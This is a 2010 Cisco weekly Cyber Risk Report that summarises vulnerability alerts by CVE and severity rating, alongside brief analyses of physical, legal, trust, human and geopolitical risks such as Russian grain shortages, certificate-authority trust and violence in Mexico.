The Cyber Risk Report is a strategic intelligence product that highlights current security activity and mid- to long-range perspectives. The report addresses seven major risk management categories: vulnerability, physical, legal, trust, identity, human, and geopolitical. Cyber Risk Reports are powered by Cisco Security Intelligence Operations, an advanced security infrastructure that identifies, analyzes, and defends against threats to keep organizations informed and protected. Cyber Risk Reports are the collaborative efforts of Cisco security analysts from the following teams: IntelliShield, Applied Intelligence, Remote Management Services, Intrusion Prevention System Signature Development, Cisco Product Security Incident Response, Cisco Malware Research, Strategic Technology Assessment Team, Infrastructure Security Research & Development, IronPort Email and Web Threat Research, Critical Infrastructure Assurance Group, Advanced Services, Security Sales and Engineering, Corporate Security Programs, Government Affairs, and Legal Support.
Vulnerability
Vulnerability activity for the period was decreased from the previous period. The period was highlighted by security advisories and updates for vulnerabilities in IBM Tivoli Storage Manager, vulnerabilities in Red Hat Enterprise Virtualization Hypervisor, and additional Microsoft vulnerabilities not covered in the previous week's monthly security bulletins. Cisco released a security advisory for a vulnerability in the Wireless Control System that could allow an unauthenticated, remote attacker to conduct cross-site scripting attacks, reported in IntelliShield alert 21123. Adobe released two security advisories for vulnerabilities in Adobe Reader and Acrobat, reported in IntelliShield alerts 21093 and 20294.
Security researcher, Rafal Wojtczuk, released a paper detailing a local attack against the Linux kernel that may result in arbitrary code execution with elevated privileges. Although the underlying vulnerability has been publicly discussed as early as 2004, the recent attention created by Wojtczuk has garnered a fix in the Linux kernel. This issue has been assigned CVE-2010-2240 and was discussed in IntelliShield Alert 21169.
Recent SQL injection attack activity has been gaining media attention for successfully affecting pages on the apple.com website. These attacks continue current trends in which attackers add malicious content to legitimate web pages, often hidden iframes that attempt to exploit unpatched browser vulnerabilities using obfuscated SQL statements intended to evade detection and filtering.
IntelliShield published 99 events last week: 39 new events and 60 updated events. Of the 99 events, 75 were Vulnerability Alerts, 10 were Security Activity Bulletins, two were Security Issue Alerts, 10 were Threat Outbreak Alerts, one was an Applied Mitigation Bulletins, and one was a Cyber Risk Report. The alert publication totals are as follows:
Weekly Alert Totals
Significant Alerts for August 16–22, 2010
Adobe Acrobat and Reader cooltype.dll Remote Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 21093, Version 4, August 20, 2010
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2010-2862
Adobe Acrobat and Reader contain a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on the targeted system. Proof-of-concept code that demonstrates an exploit of this vulnerability is publicly available. Adobe has confirmed this vulnerability and software updates are available.
Multiple Vendor PDF Viewer /launch Program Execution Attack
IntelliShield Vulnerability Alert 20294, Version 3, August 20, 2010
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2010-1240
Adobe has released a security bulletin and updated software to address the multiple vendor PDF viewer /launch program execution attack.
Previous Alerts That Still Represent Significant Risk
Microsoft Windows Win32k Kernel Driver Window Creation Privilege Escalation Vulnerability
IntelliShield Vulnerability Alert 21027, Version 3, August 12, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-1897
Exploits of the Microsoft Windows Win32k kernel driver window creation privilege escalation vulnerability are currently being observed in the wild.
Microsoft Windows XML Core Services Response Handling Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 21021, Version 2, August 11, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-2561
Proof-of-concept code that exploits the Microsoft Windows XML core services response handling arbitrary code execution vulnerability is publicly available. The alert update also indicates an increase in the urgency.
Microsoft Windows Tracing Feature for Services Registry Key Access Control Lists Privilege Escalation Vulnerability
IntelliShield Vulnerability Alert 21018, Version 3, August 11, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-2554
Exploits are currently being observed in the wild. Microsoft is aware of an increase in the number of targeted attacks that use the readily available exploit code.
Microsoft Windows Server Message Block Packet Processing Pool Overflow Remote Code Execution Vulnerability
IntelliShield Vulnerability Alert 21014, Version 4, August 11, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-2550
Exploits are currently being observed in the wild. Microsoft is aware of an increase in the number of targeted attacks that leverage the readily available exploit code.
Microsoft Windows Kernel Win32k Driver Exception Handling Privilege Escalation Vulnerability
IntelliShield Vulnerability Alert 21024, Version 2, August 11, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-1894
Proof-of-concept code that demonstrates an exploit of the Microsoft Windows Kernel Win32k driver exception handling privilege escalation vulnerability is publicly available. This updated alert indicates an increase in the urgency.
Microsoft Windows .lnk File Processing Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 20918, Version 4, August 2, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-2568
Microsoft has released a security bulletin and updates to address the Windows .lnk file processing arbitrary code execution vulnerability.
Microsoft Windows .lnk File Vulnerability Used for Malware Outbreak Targeting SCADA Systems
IntelliShield Vulnerability Alert 20915, Version 5, August 2, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-2568
Microsoft has released a security bulletin along with software updates to address the vulnerability exploited by malicious software.
Microsoft Windows Help and Support Center Whitelist Bypass Vulnerability
IntelliShield Vulnerability Alert 20691, Version 6, July 15, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-1885
Exploits of the Microsoft Windows Help and Support Center whitelist bypass vulnerability are being observed in the wild. Functional code that exploits this vulnerability is publicly available. Microsoft has confirmed this vulnerability in a security bulletin and released updated software.
DNSSEC-Enabled Queries to the DURZ Serving Root May Affect DNS Services
IntelliShield Vulnerability Alert 20418, Version 2, July 15, 2010
Urgency/Credibility/Severity Rating: 2/5/3
Signed root DNS zones are designated to go into effect during a maintenance window July 15, 2010, establishing the availability of DNSSEC-enabled queries.
Multiple Adobe Products Remote Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 20625, Version 7, July 1, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-1297
Multiple Adobe products contain a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on the targeted system or cause a denial of service (DoS) condition. Functional code that exploits this vulnerability is available. Adobe has confirmed this vulnerability and released updated software.
IBM and Oracle Java Web Start Java Development Kit ActiveX Control Command-Line Injection Vulnerability
IntelliShield Vulnerability Alert 20314, Version 6, July 29, 2010
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2010-0886, CVE-2010-0887, CVE-2010-1423
Oracle Java contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands on the system with the privileges of the user. Systems with Oracle Java JRE and JDK 6 Update 10 and later contain the affected ActiveX control and are vulnerable. Red Hat has released an additional security advisory and updated packages to address the Oracle Java Web Start Java Development Kit ActiveX control command-line injection vulnerability.
Transport Layer Security Renegotiation Remote Man-in-the-Middle Attack Vulnerability
IntelliShield Vulnerability Alert 19361, Version 61, August 10, 2010
Urgency/Credibility/Severity Rating: 2/5/3
CVE-2009-3555
Multiple Transport Layer Security (TLS) implementations contain a vulnerability when renegotiating a TLS session that could allow an unauthenticated, remote attacker to conduct a man-in-the-middle attack. Proof-of-concept code that exploits this vulnerability is publicly available. HP has released an additional security bulletin and updated software to address the Transport Layer Security renegotiation remote man-in-the-middle attack vulnerability.
Physical
Fires and Heat in Western Russia Cause Grain Shortages
Wildfires continue to burn in areas in western Russia around the capital city of Moscow. Although cooler weather is expected for affected areas, the unfortunate damage has already been done. As a result of grain crops affected by fires and adverse weather, Russian government officials have proposed an export ban to stop rising prices inside the country. The ban could affect trading partners, such as Egypt, who rely heavily upon Russian grain exports. Read More
IntelliShield Analysis: Grain shortages in Russia have already affected prices world wide and may raise food prices overall. However, price indexes are still lower than they were in 2008 when we saw unrest in countries dependent upon exports. Additionally, concern over stability in Russia and the government's ability to respond to emerging disasters may curb foreign investment in Russian infrastructure and development. However, the crisis may create other opportunities for foreign businesses that may accept the risks to enter into new deals in Russia.
Legal
Subscriber Information from Bankrupt Magazine to be Destroyed
After declaring bankruptcy, XY magazine's subscriber information was one asset over which business partners were disputing ownership, but have since decided to destroy the information. The information, which contained personal details of subscribers, was originally covered by a privacy policy that prevented transfer to a third-party. During the dispute, the Federal Trade Commission indicated that failure to uphold the privacy policy's prohibition of transfer could constitute unfair trade practices.
Read More
Additional Information
IntelliShield Analysis: Information is a valuable asset in technological mergers and acquisitions, but privacy policies may increasingly be important for socially-enabled online companies. Users may continue to push for organizations to have more stringent privacy policies, to protect their individual rights. However, such policies may create problems for companies looking to be purchased by bigger companies in their markets as the liquidity of that information may be an intrinsic factor to the company's value. As more information is collected to provide tailored user experiences and advertising, organizations can expect the value and details in privacy policies to become more important, not only for operational purposes but also for the long-term transfer and disposal of that data, and the value that it retains. Cisco first covered this topic during the July 12-18, 2010 Cyber Risk Report.
Trust
Silent Update Feature Added to Firefox
Mozilla is expected to follow in Google's footsteps by implementing a silent update feature in Firefox version 4 when it is released. According to a recent posting, this feature would only apply to minor updates (e.g. version 3.7, 3.8, etc.) of Firefox versions, as users would still be prompted to agree to updates to major versions (e.g. version 4, 5, etc.).
Read More
Additional Information
IntelliShield Analysis: There will be those in the user community that will take offense to this approach in which updates to software and applications on machines in a users possession are made without express permission of the user since the user has sole authority over the software that is installed on their computer. On the other hand, there will be many in the security community that agree with this direction because it enhances the overall security of end-hosts without depending on the decision making of end-users; many of whom simply do not know the technical details of end-host vulnerabilities, understand the extent of potential impact on the Internet due to the exploitation of these vulnerabilities, and have the insight into how these updates and patches protect end-hosts and the Internet as a whole.
Identity
There was no significant activity in this category during the time period.
Human
Electronic Frontier Foundation Warns of Untrustworthy SSL, Undetectable Surveillance
In an open letter, the Electronic Frontier Foundation (EFF) asked Verizon to consider revoking the authority Verizon issued to Etisalat to certify web sites. Etisalat is the telecommunications company in the United Arab Emirates that issued an update to Blackberry users that contained surveillance software and more recently threatened to discontinue the Blackberry service. Their reasoning behind the recent action is due to Research in Motion's refusal to allow surveillance back doors in Blackberry software. Etisalat, using the certificates received from Verizon, has the ability to issue trusted certificates for any website, including those already in existence. These website impostors could be implicitly trusted by Internet Explorer and Firefox without any warning presented to the user.
Read More
Additional Information
IntelliShield Analysis: Most users implicitly trust encrypted web sites and the Certificate Authorities (CAs) that issue the digital certificates that trusted encryption depends upon. We regularly connect to online banking sites, e-commerce, and other sites into which we enter personal information and we are confident that the website belongs to who we think it does when there are no browser warnings presented. But should we implicitly trust the certifying authorities? The issue of due diligence by each and every CA is a huge concern. Have the issuing CA's adequately verified the organization requesting the certificate? The EFF has mapped over 650 organizations who can issue certificates that are trusted by default configurations of Microsoft's Internet Explorer and Mozilla's FireFox browsers. The EFF has begun the SSL Observatory Project to investigate the certificates used to secure encrypted websites. There is an old Latin quote "Quis custodiet ipsos custodes"?, which translated means "Who watches the watchers"? In this case it may be the SSL Observatory Project. Users and organizations need to take a more active roll in determining which certificates they will trust or choose not to accept.
To view the installed certificates (and inforomation about the issuing CA) perform the following steps in your browser; for Internet Explorer, from the Tools menu chose the Internet Options item, then choose the Content Tab, and then choose the Certificates button. For Firefox, open the Preferences menu and select the Advanced Tab, then choose the Encryption Tab, and finally the View Certificates button.
Geopolitical
Mexico Security Situation Worsens
A new surge of drug-related violence in the affluent business center of Monterrey, punctuated by the murder of the mayor of nearby Santiago, has brought Mexico's drug-related violence back into the headlines. Monterrey, until now a relatively safe city, has been the site of gun battles in recent weeks as two rival drug cartels fight for the upper hand. Business leaders purchased full-page ads in prominent newspapers last week, urging President Calderon to send troops to restore order. At the same time, President Calderon met with regional public officials in an effort to examine possible new strategies, as the death toll since Calderon launched his counter-narcotics campaign in 2006 topped 28,000.
Read More
Additional Information
IntelliShield Analysis: The fact that drug-related violence has surged in Monterrey, several hours drive from the U.S. border and far from key drug transit ports, is of particular concern. The Wall Street Journal speculated that the Monterrey violence shows that the drug war has moved literally onto the doorsteps of wealthy drug lords, some of whom live in the city's affluent neighborhoods. There remains little evidence that multi-national companies or expatriates have been targeted, but employees caught in the wrong place at the wrong time run the risk of kidnapping, robbery, or worse. Hopes are high that economic recovery will take some pressure off the drug trade by providing more legitimate jobs for young Mexicans. However, with another year left in President Calderon's term, chances are that drug related violence will continue. Maintaining a strong physical security stance will be crucial for companies doing business in Mexico, particularly in border regions.
Upcoming Security Activity
VMWorld: August 30-September 3, 2010
InterOp NY: October 18-22, 2010
Because of the potential for increased risk on multiple vectors, organizations' security teams should be aware of and consider making special preparations for the following dates:
World Expo (Shanghai, China): May 1-October 31, 2010
Ramadan: August 11-September 8, 2010
Additional Information
For more information about the vulnerabilities contained in this report or the Cisco Security IntelliShield Alert Manager Service, please visit
Cisco Security IntelliShield Alert Manager Service
For information on obtaining a free trial of the Cisco Security IntelliShield Alert Manager Service, please visit
Trial Registration
This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information on the document or materials linked from the document is at your own risk. Cisco reserves the right to change or update this document at any time.
Back to Top
